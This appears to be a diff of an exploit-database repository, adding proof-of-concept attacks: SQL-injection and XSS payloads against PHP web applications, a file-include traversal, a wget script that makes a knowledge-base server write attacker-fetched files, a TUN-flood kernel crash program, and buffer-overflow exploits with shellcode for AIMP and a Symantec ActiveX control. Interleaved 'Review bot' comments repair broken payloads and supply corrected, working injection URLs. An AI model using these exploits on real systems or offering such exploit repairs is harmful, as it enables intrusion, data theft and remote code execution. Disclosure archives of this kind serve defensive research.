* Copyright (C) 2008 Remi Denis-Courmont. All rights reserved. *
* *
* Redistribution and use in source and binary forms, with or without *
* modification, are permitted provided that the above copyright notice is *
* retained and/or reproduced in the documentation provided with the *
* distribution. *
* *
* To the extent permitted by law, this software is provided with no *
* express or implied warranties of any kind. *
* The situation as regards scientific and technical know-how at the time *
* when this software was distributed did not enable all possible uses to be *
* tested and verified, nor for the presence of any or all faults to be *
* detected. In this respect, people's attention is drawn to the risks *
* associated with loading, using, modifying and/or developing and *
* reproducing this software. *
* The user shall be responsible for verifying, by any or all means, the *
* software's suitability for its requirements, its due and proper *
* functioning, and for ensuring that it shall not cause damage to either *
* persons or property. *
* *
* The author does not warrant that this software does not infringe any or *
* all intellectual right relating to a patent, a design or a trademark. *
* Moreover, the author shall not hold someone harmless against any or all *
* proceedings for infringement that may be instituted in respect of the *
* use, modification and redistrbution of this software. *
*****************************************************************************/
#define _GNU_SOURCE 1
#include <stdio.h>
#include <string.h>
#include <stdarg.h>
#include <stdlib.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <unistd.h>
#include <netinet/in.h>
#include <linux/if.h>
#include <linux/if_tun.h>
#include <pthread.h>
static void run (const char *fmt, ...)
{
va_list ap;
char *cmd;
va_start (ap, fmt);
vasprintf (&cmd, fmt, ap);
va_end (ap);
system (cmd);
free (cmd);
}
static int tun_open (void)
{
struct ifreq req;
int fd = open ("/dev/net/tun", O_RDWR);
if (fd == -1)
return -1;
memset (&req, 0, sizeof (req));
req.ifr_flags = IFF_TUN;
if (ioctl (fd, TUNSETIFF, &req))
{
(void) close (fd);
return -1;
}
run ("ip link set dev %s up", req.ifr_name);
run ("ip -6 address add fd34:5678:9abc:def0::1/64 dev %s",
req.ifr_name);
return fd;
}
static unsigned rcvd;
static int tun;
static void cleanup_fd (void *data)
{
(void) close ((intptr_t)data);
}
static void *thread (void *data)
{
unsigned n = (uintptr_t)data;
struct sockaddr_in6 dst;
uint16_t tunhead[2];
int fd = socket (PF_INET6, SOCK_DGRAM, 0);
pthread_cleanup_push (cleanup_fd, (void *)(intptr_t)fd);
memset (&dst, 0, sizeof (dst));
dst.sin6_family = AF_INET6;
dst.sin6_addr.s6_addr32[0] = htonl (0xfd345678);
dst.sin6_addr.s6_addr32[1] = htonl (0x9ABCDEF0);
dst.sin6_addr.s6_addr32[2] = htonl (0);
dst.sin6_port = htons (53);
__sync_fetch_and_and (&rcvd, 0);
for (;;)
{
dst.sin6_addr.s6_addr32[3] =
__sync_fetch_and_add (&rcvd, 1) % n;
sendto (fd, NULL, 0, 0,
(struct sockaddr *)&dst, sizeof (dst));
read (tun, tunhead, 4);
}
pthread_cleanup_pop (0);
}
int main (void)
{
setvbuf (stdout, NULL, _IONBF, 0);
tun = tun_open ();
if (tun == -1)
{
perror ("Error");
return 1;
}
for (uintptr_t n = 1; n <= (1 << 20); n *= 2)
{
struct timespec ts = { 1, 0, };
pthread_t th;
printf ("%6ju: ", (uintmax_t)n);
pthread_create (&th, NULL, thread, (void *)n);
clock_nanosleep (CLOCK_MONOTONIC, 0, &ts, NULL);
pthread_cancel (th);
pthread_join (th, NULL);
__sync_synchronize ();
printf ("%12u\n", rcvd);
}
close (tun);
return 0;
}
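Review bot: the description says "attackers can exploit this issue to crash the affected kernel", but the PoC needs privileges it never mentions: `tun_open()` opens `/dev/net/tun` and issues `TUNSETIFF`, which requires CAP_NET_ADMIN, and then shells out to `ip link set ... up` and `ip -6 address add ... /64`, so this is a root or CAP_NET_ADMIN trigger, not an unprivileged local DoS; say so in the header text. Two build points: the compile line in the leading comment names `tunload.c` while the file is `33635.c`, and it lists `-lpthread -lrt` before the source, which toolchains that link with `--as-needed` silently drop; put the libraries after the source (`gcc -std=gnu99 -O2 -g 33635.c -o tunload -lpthread -lrt`). In `thread()` the `read(tun, tunhead, 4)` return value is ignored and `sendto()` errors are never reported, so when the flood stalls the per-`n` counters printed in `main()` give no hint why; checking for `-1` and printing `errno` once would make the output interpretable. `run()` passes `req.ifr_name` through `system()` unquoted; the name is kernel-assigned here, but `fork`/`execvp` with an argv would avoid the shell entirely.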

204
platforms/php/webapps/33626.txt Executable file
@ -0,0 +1,204 @@
# Exploit Title: PHPBTTracker+ 2.2 SQL Injection
# Date: May 13th, 2014
# Exploit Author: BackBox Team <info@backbox.org>
# Vendor Homepage: http://phpbttrkplus.sourceforge.net/
# Software Link: http://sourceforge.net/projects/phpbttrkplus/files/
# Version: PHPBTTracker+ 2.2
# Tested on: PHP 5.4.27, Apache 2.4.9, MySQL >= 5.0.0
========================================================================
Advisory: PHPBTTracker+ 2.2 SQL Injection
Disclosure by: BackBox Team <info@backbox.org>
Severity: High
I. INTRODUCTION
========================================================================
SQL Injection through User-Agent.
User agent is an HTTP header section provided by application used by the
original client. This is used for statistical purposes and the protocol
violation tracing. The first white space delimited word must include the
product name with an optional slash and version number.
User agent injection is a critical issue for web applications. In this
specific case its worthed to do an investigation on the header section
of user-agent to see if there is any malformation that will allow an SQLi.
Example:
GET /tracker.php
User-Agent: Transmission/2.51' OR (SLEEP(20)) AND 'aaaa'='aaaa
Host: [host]
Accept: */*
Accept-Encoding: gzip;q=1.0, deflate, identity
II. BACKGROUND
========================================================================
BitTorrent tracker protocol is used by clients to request the IP
addresses of other peers associated with a torrent, and to exchange the
client's transfer statistics. Clients connect to a centralized server,
known as a *tracker*, which stores their IP addresses and responds with
the IP addresses of other clients (also known as *peers*). The tracker
has no knowledge about the association of the nodes and their pieces
(it functions only as bridge between clients).
The standard tracker protocol is based on HTTP, with request data
encoded as query parameters (as used by HTML forms) and response data
BEncoded.
Query parameters must be encoded according to the rules for HTML form
submissions through HTTP GET: 'reserved character' bytes are encoded in
hexadecimal as %HH, and space is encoded as "+"; names and values are
joined with "=" and the pairs joined with "&".
The tracker's URL announce is obtained from the announce entry of the
root dictionary of the torrent metadata file.
Clients announce themselves by sending a GET request to the tracker's
URL announce with "?" and the following parameters (encoded as above)
appended:
info_hash
The 20 byte sha1 hash of the bencoded form of the info value from
the metainfo file. Note that this is a substring of the metainfo
file. Don't forget to URL-encode this.
peer_id
A string of length 20 which the downloader uses as its id. Each
downloader generates its own id at random at the start of a new
download. Don't forget to URL-encode this.
port
Port number that the peer is listening on. Common behavior is for a
downloader to try to listen on port 6881 and if that port is taken
try 6882, then 6883, etc. and give up after 6889.
uploaded
Total amount uploaded so far, represented in base ten in ASCII.
downloaded
Total amount downloaded so far, represented in base ten in ASCII.
left
Number of bytes that a specific client still has to download,
represented in base ten in ASCII. Note that this can't be computed
from downloaded and the file length since the client might be
resuming an earlier download, and there is a chance that some of
the downloaded data failed an integrity check and had to be
re-downloaded.
event
Optional key which maps to started, completed, or stopped (or empty,
which is the same as not being present). If not present, this is one
of the announcements done at regular intervals. An announcement
using started is sent when a download first begins, and one using
completed is sent when the download is complete. No completed is
sent if the file was complete when started. Downloaders should send
an announcement using 'stopped' when they cease downloading,
if they can.
Example:
http://hostname/announce
?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4
&peer_id=
&port=51413
&uploaded=0
&downloaded=0
&left=0
&event=started
III. DESCRIPTION
========================================================================
In order to exploit the vulnerability the torrent has to be managed by
the tracker. First we need to extract the GET request, and parse out the
parameter "info_hash", a proxy or a traffic sniffer like Wireshark can
help us to do that.
Example:
GET /phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started HTTP/1.1
User-Agent: Transmission/2.51
Host: hostname
Accept: */*
Accept-Encoding: gzip;q=1.0, deflate, identity
Then it's possible to inject SQL commands inside the User-Agent field.
IV. PROOF OF CONCEPT
========================================================================
Is it possible to verify the vulnerability by using, for example,
sqlmap or curl...
* Using SQLMap
raffaele@backbox:~$ sqlmap -u "http://hostname/phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started" -o --level 3 -p user-agent
[...]
User-Agent parameter 'User-Agent' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 318 HTTP(s) requests:
---
Place: User-Agent
Parameter: User-Agent
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: sqlmap/1.0-dev-0f581cc (http://sqlmap.org)" RLIKE (SELECT (CASE WHEN (6960=6960) THEN 0x73716c6d61702f312e302d6465762d306635383163632028687474703a2f2f73716c6d61702e6f726729 ELSE 0x28 END)) AND "mhBW"="mhBW
---
* Using curl
raffaele@backbox:~$ curl "http://hostname/phpbttrkplus-2.2/tracker.php/announce?info_hash=%ffq%de%ea%00a%bab%8cC%fb%fe%e6%00uX%c5%92%7d%d4&peer_id=&port=51413&uploaded=0&downloaded=0&left=0&event=started" -A 'asd" OR (SLEEP(15)) AND "'
[...]
d8:intervali1800e12:min intervali300e5:peersld2:ip9:127.0.0.17:peer id20:4:porti51413eed2:ip9:127.0.0.17:peer id20:04:porti51413eee10:tracker id4:1131e
V. BUSINESS IMPACT
========================================================================
An attacker could execute arbitrary SQL queries on the vulnerable
system. This may compromise the integrity of database and/or expose
sensitive information.
VI. SYSTEMS AFFECTED
========================================================================
PHPBTTracker+ Version 2.2 is vulnerable (probably v2.x and
RivetTracker v1.x too)
Software Link: http://phpbttrkplus.sourceforge.net/
Tested on: PHP 5.4.27, Apache 2.4.9, MySQL >= 5.0.0
VII. REFERENCES
========================================================================
https://wiki.theory.org/BitTorrent_Tracker_Protocol
http://resources.infosecinstitute.com/sql-injection-http-headers
VIII. CREDITS
========================================================================
The vulnerability has been discovered by BackBox Linux Team
http://www.backbox.org
IX. VULNERABILITY HISTORY
========================================================================
May 13th, 2014: Vulnerability identification
May ??th, 2014: Vendor notification
May ??th, 2014: Vulnerability disclosure
X. LEGAL NOTICES
========================================================================
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse
of this information.
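Review bot: the quoting context is inconsistent within the advisory: the Introduction example (`Transmission/2.51' OR (SLEEP(20)) AND 'aaaa'='aaaa`) breaks out with a single quote, but the sqlmap payload (`... RLIKE (SELECT ...) AND "mhBW"="mhBW`) and the curl PoC (`-A 'asd" OR (SLEEP(15)) AND "'`) both use double quotes, so the tracker evidently wraps the User-Agent value in double quotes and the Introduction example will not inject; align it with the working payload. The curl run is a time-based test, yet only the bencoded response body is shown; include the elapsed time (`curl -w '%{time_total}\n' ...` or `time curl ...`) so a reader can confirm the 15 s delay rather than a normal response. The `sqlmap` invocation uses `-o` (optimisation) where the surrounding prose suggests an output option was intended; drop it or replace it with what was meant. Also fill in or remove the `May ??th, 2014` placeholders in the vulnerability history before publication.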

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38184/info
CommodityRentals CD Rental Software is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?view=catalog&item_type=M&cat_id=3+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0Ã?3a,admin_password),3,4+from+rental_adminâ??
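Review bot: the proof-of-concept URL is corrupted by a character-encoding error and will not run as shown: `0Ã?3a` inside `concat(admin_name,0Ã?3a,admin_password)` should be the MySQL hex literal `0x3a` (a colon separator), and the trailing `rental_adminâ??` is a mangled terminator, most likely a `--` comment. Restore the ASCII payload and percent-encode it so it survives copying, for example `index.php?view=catalog&item_type=M&cat_id=3+AND+1=2+UNION+SELECT+0,1,concat(admin_name,0x3a,admin_password),3,4+from+rental_admin--+` (or end it with `%23`). It would also help to state the affected version, since the description gives none.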

28
platforms/php/webapps/33636.sh Executable file
@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/38186/info
Interspire Knowledge Manager is prone to a vulnerability that allows attackers to create arbitrary files on a vulnerable computer.
An attacker may exploit this issue to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.
Knowledge Manager 5.1.3 is vulnerable; other versions may also be affected.
# #!/bin/sh
# echo "$0 <target_url> <relative_path_from_admin_dir> <file_name>
<content_url>
# example: $0 http://target.com/knowledge_base ../../../ file.php
http://source
# if kb is installed at knowledge_base, then the file: file.php will be
# created in the base application directory from the content at
http://source
# "
# sessionUrl=$1'/admin/de/dialog/file_manager.php'
# uploadUrl=$1'/admin/de/dialog/callback.snipshot.php'
# wget -O r1 --save-cookies tmp.cookies --keep-session-cookies
"$sessionUrl?userdocroot=$2&imgDir=&obj=1"
# echo "session created, setting file name $2$3"
# wget -O r2 --keep-session-cookies --load-cookies tmp.cookies
"$uploadUrl?action=step1&source_image=name&save_file_as=$3"
# echo "upload content from: $4 ..."
# wget -O r3 --keep-session-cookies --load-cookies tmp.cookies
"$uploadUrl?action=step2&source_image=name&save_file_as=$3&snipshot_output=$4"
# echo "file created test access to the script at: $1/admin/de/dialog/$2$3";
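Review bot: the script is not runnable as shipped: every line, including the `#!/bin/sh` shebang on the first line, is prefixed with `# `, and the three `wget` commands are wrapped so that each URL argument sits on the following line with no `\` continuation, so even after uncommenting, `wget -O r1 --save-cookies tmp.cookies --keep-session-cookies` would run with no URL and the shell would then try to execute the quoted URL as a command. Uncomment the lines, rejoin each `wget` with its URL, and quote `$1`..`$4`. The description should also say whether the `admin/de/dialog/file_manager.php` and `callback.snipshot.php` requests need an authenticated administrator session: the script sends no credentials and relies only on the cookie saved from the first request ("session created"), which implies the file-manager dialog hands out a usable session without login; if that is the case, state it explicitly, because it makes this an unauthenticated arbitrary file write whose content is fetched by the server from the attacker-supplied `snipshot_output` URL.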

11
platforms/php/webapps/33637.txt Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/38204/info
The Joomla! Webee component is prone to an SQL-injection vulnerability and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
The attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Webee 1.1.1 is vulnerable to all these issues. Webee 1.2 is reportedly affected by the SQL-injection issue and possibly the HTML-injection issues as well.
http://www.example.com/index2.php?option=com_webeecomment&task=default&articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 --
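Review bot: the PoC URL carries the payload unencoded (`articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 --`); clients will turn the spaces into `%20`, but the MySQL `--` comment is only recognised with a following whitespace character, and a trailing space at the end of a copied line is easily lost. Publish the URL percent-encoded with a terminator that survives copying, e.g. `articleId=999%20union%20select%201,2,VERSION(),4,5,6,7,8,9,10,11,12--%20` or `...,12%23`. The hunk demonstrates only the SQL injection; the HTML-injection issues in the description are the subject of the companion `33638.txt` in this commit, so refer to it rather than repeating the paragraph here.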

13
platforms/php/webapps/33638.txt Executable file
@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/38204/info
The Joomla! Webee component is prone to an SQL-injection vulnerability and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
The attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Webee 1.1.1 is vulnerable to all these issues. Webee 1.2 is reportedly affected by the SQL-injection issue and possibly the HTML-injection issues as well.
[color=red;xss:expression(window.r?0:(alert(String.fromCharCode(88,83,83)),window.r=1))]XSS[/color]
[img]http://foo.com/fake.png"/onerror="alert(String.fromCharCode(88,83,83))[/img]
[url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url]
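Review bot: the description block is a verbatim copy of `33637.txt`, including the SQL-injection paragraph, while this file holds only the three BBCode HTML-injection payloads; trim the text to the HTML-injection issue and say which BBCode input accepts them (the comment body, presumably, but the hunk does not say). The first payload depends on `xss:expression(...)`, a CSS expression that only Internet Explorer evaluates (dropped in IE8 standards mode), so the `[img]` and `[url]` attribute break-outs (`"/onerror="...` and `"/onmouseover="...`) are the vectors that matter for other browsers; note that precondition so a tester does not discard the finding when the `[color]` vector fails.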

16
platforms/php/webapps/33639.txt Executable file
@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/38209/info
Joomla! EasyBook component is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
EasyBook 2.0.0rc4 is vulnerable; other versions may also be affected.
The following example input is available:
[img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]
foo.com" onmouseover="alert(String.fromCharCode(88,83,83));return false;
' onclick="alert('XSS')"
" onclick="alert('xss')"
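Review bot: the four example inputs are listed without the field they belong in: `[img]fake.png" onerror=...[/img]` is a BBCode body payload, while `foo.com" onmouseover=...` and the two `onclick` fragments are attribute break-outs, presumably for the guestbook entry's website, name or e-mail fields, but the hunk never names the EasyBook form, the parameter for each payload, or whether entries are stored (rendered to every visitor) or only reflected. Add the form URL and parameter per payload and say whether an entry must be approved before it renders, since that determines the real exposure.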

13
platforms/php/webapps/33641.txt Executable file
@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/38220/info
The Joomla! F!BB component is prone to an SQL-injection vulnerability and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage the HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
The attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
F!BB 1.96 is vulnerable; other versions may also be affected.
The following proof-of-concept URI and data are available:
http://www.example.com/index.php?option=com_fbb&func=advsearch&q=&exactname=1&childforums=1&limitstart=0&searchuser=%' AND SUBSTRING(@@version,1,1)=5 --
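Review bot: the PoC URI contains a raw `%` followed by `'` in `searchuser=%' AND SUBSTRING(@@version,1,1)=5 --`; a `%` that starts an invalid percent-escape is treated inconsistently (PHP leaves `%'` undecoded, some clients and proxies reject the request), so encode it as `%25'`, the spaces as `%20`, and keep the space after `--` (or use `%23`) so the MySQL comment is honoured. The description also lists HTML-injection vulnerabilities, but the hunk shows only the boolean-based SQL injection; either add those payloads with their parameters or drop the claim from this file.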

12
platforms/php/webapps/33643.txt Executable file
@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/38234/info
CMS Made Simple is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
CMS Made Simple 1.6.6 is affected; other versions may also be vulnerable.
http://www.example.com/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script>
http://www.example.com/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39
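Review bot: the local file-include PoC has preconditions the description leaves out: the `mact` parameter uses backslash traversal (`%5c..%5c..`) to reach `boot.ini`, which only makes sense on a Windows host, and it ends the path with `%00`, which relies on PHP truncating file names at a null byte, behaviour removed in PHP 5.3.4. State the Windows and PHP-version requirements and add a POSIX variant (`../../../../etc/passwd%00`) so the issue can be confirmed on Linux installs. The XSS URL should have its payload percent-encoded (`showtemplate=false%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E`) so it survives copy-and-paste.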

53
platforms/windows/dos/33640.py Executable file
@ -0,0 +1,53 @@
source: http://www.securityfocus.com/bid/38215/info
AIMP is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
AIMP 2.51 is vulnerable; other versions may also be affected.
#!/usr/bin/python
#
# AIMP2 (aimp2c.exe) m3u malformed open file stack overflow exploit
# Coded by : Molotov
#
# Greats To : Corelanc0d3r & exploit-db
#
# thanks to : Simo36 & all friends
#
shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARA"
"LAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZA"
"BABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB"
"KLK8U9M0M0KPS0U99UNQ8RS44KPR004K22LLDKR2MD4KCBMX"
"LOGG0JO6NQKOP1WPVLOLQQCLM2NLMPGQ8OLMM197K2ZP22B7"
"TK0RLPTK12OLM1Z04KOPBX55Y0D4OZKQXP0P4KOXMHTKR8MP"
"KQJ3ISOL19TKNTTKM18VNQKONQ90FLGQ8OLMKQY7NXK0T5L4"
"M33MKHOKSMND45JBR84K0XMTKQHSBFTKLL0KTK28MLM18S4K"
"KT4KKQXPSYOTNDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM"
"2JKQTMSU89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU"
"7MEMKOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"
"QQ2LRCM0LJA"
)
header = "[playlist]\nNumberOfEntries=3\n\n"
header += ("File1=");
crash = 'A' * 2222
crash+= shellcode
crash+= 'B' * (4014-len(shellcode)-2222)
crash+= '\x41\x6d'
crash+= '\x0e\x45'
align = '\x58\x6d'
align+= '\x58\x6d'
align+= '\x58\x6d'
align+= '\x58\x6d'
align+= '\x05\x01\x11\x6d'
align+= '\x2d\x0F\x11\x6d'
align+= '\x50\x6d\xC3'
padd = 'D' * 3000
padd= 'D'*3000#n7Cn
buffer = header + crash +align+padd +'\n'
file=open('ss.m3u','w')
file.write(buffer)
file.close()
print "[+] ss.m3u file created successfully"
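Review bot: two things in the buffer construction look unintended: `padd` is assigned twice (`padd = 'D' * 3000` and then `padd= 'D'*3000#n7Cn`), so the first line and the stray `#n7Cn` comment should go, and the file is written as `ss.m3u` although the header (`[playlist]\nNumberOfEntries=3\n\nFile1=`) is the PLS playlist format; either write `ss.pls` or state that AIMP parses PLS content regardless of the `.m3u` extension. The script is Python 2 (`print "..."` statement), which a comment should say. The alphanumeric shellcode is never described: state what it executes and on which Windows version the offsets (`'A' * 2222`, the 4014-byte total, the `\x41\x6d` / `\x0e\x45` overwrite and the `\x58\x6d` gadgets) were taken, and why every gadget's second byte is `\x6d`, since the hunk gives a reader no way to adapt the exploit to another build.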

@ -1,8 +1,8 @@
source: http://www.securityfocus.com/bid/2674/info
#source: http://www.securityfocus.com/bid/2674/info
Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.
#Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.
* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings.
#* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings.
#!/usr/bin/perl
# Exploit By storm@stormdev.net
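Review bot: commenting out the four advisory lines makes the file parse as Perl, but `#!/usr/bin/perl` now follows them, and a shebang is only honoured when it is the very first line of the file, so running the script directly (`./20815.pl`) will no longer pick the Perl interpreter; move `#!/usr/bin/perl` above the `#source:` comment, or keep the header after the shebang inside a `=pod` ... `=cut` block. The replacement of the uncommented lines is otherwise correct.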

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/38222/info
The Symantec Client Proxy ActiveX control is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
Successful exploits allow remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions.
The following are vulnerable:
Symantec AntiVirus 10.0.x and 10.1.x prior to 10.1 MR9
Symantec AntiVirus 10.2.x prior to 10.2 MR4
Symantec Client Security 3.0.x and 3.1.x prior to 3.1 MR9
<html> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:E381F1C0-910E-11D1-AB1E-00A0C90F8F6F' id='target' /> <script language='vbscript'> arg1=String(7188, "A") target.SetRemoteComputerName arg1 </script> </html>
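Review bot: the PoC mixes two file formats and is well-formed in neither: `<package><job ...>` with `<script language='vbscript'>` is the Windows Script File (.wsf) layout, but it is nested inside `<html>`, `<object ... />` is self-closed (in IE the HTML form needs an explicit `</object>` before the control is instantiated), and `</job>` and `</package>` are missing. Pick one: a plain `.html` with `<object classid='clsid:E381F1C0-910E-11D1-AB1E-00A0C90F8F6F' id='target'></object>` followed by the VBScript block, or a `.wsf` without the `<html>` wrapper. It would also help to give the threshold length: the hunk passes `String(7188, "A")` to `SetRemoteComputerName` but does not say what the minimum crashing length is, so a reader cannot tell whether a shorter string is a negative result.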